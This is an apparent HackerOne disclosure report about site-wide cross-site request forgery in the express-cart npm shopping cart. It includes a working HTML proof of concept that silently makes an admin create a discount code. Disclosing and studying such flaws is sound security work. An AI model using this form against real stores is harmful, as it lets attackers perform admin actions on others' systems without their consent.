hackerone tuo4n8 H1:800356
History: Feb 20, 2020 - 8:09 a.m.

Node.js third-party modules: [express-cart] Wide CSRF in application

2020-02-20 08:09:27
tuo4n8
hackerone.com


I would like to report CSRF in `express-cart`.
It allows an attacker to trick the admin into performing unwanted actions. The main reason is that a CSRF token isn't used; the vulnerability is application-wide.

Module

module name: express-cart
version: 1.1.16
npm page: https://www.npmjs.com/package/express-cart

Module Description

> expressCart is a fully functional shopping cart built in Node.js (Express, MongoDB) with Stripe, PayPal, Authorize.net, Adyen and Instore payments.

Module Stats

  • weekly downloads: 21

Vulnerability

Vulnerability Description


  • Through CSRF an attacker can: create products, orders, users, discount codes, ... (requires an admin action)

Steps To Reproduce:


  • Demo: create discount codes (see the clip for details)
  1. Create the PoC HTML (generated by Burp Suite)
  2. Admin clicks
  3. Discount code is created

  • PoC:
<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost:1111/admin/settings/discount/create" method="POST">
      <input type="hidden" name="code" value="CSRF-CODE-DEMO" />
      <input type="hidden" name="type" value="percent" />
      <input type="hidden" name="value" value="30" />
      <input type="hidden" name="start" value="21/02/2020 14:32" />
      <input type="hidden" name="end" value="22/02/2020 14:32" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Wrap up


  • I contacted the maintainer to let them know: [Y/N] N
  • I opened an issue in the related repository: [Y/N] N


Impact

An attacker can perform actions with admin privileges.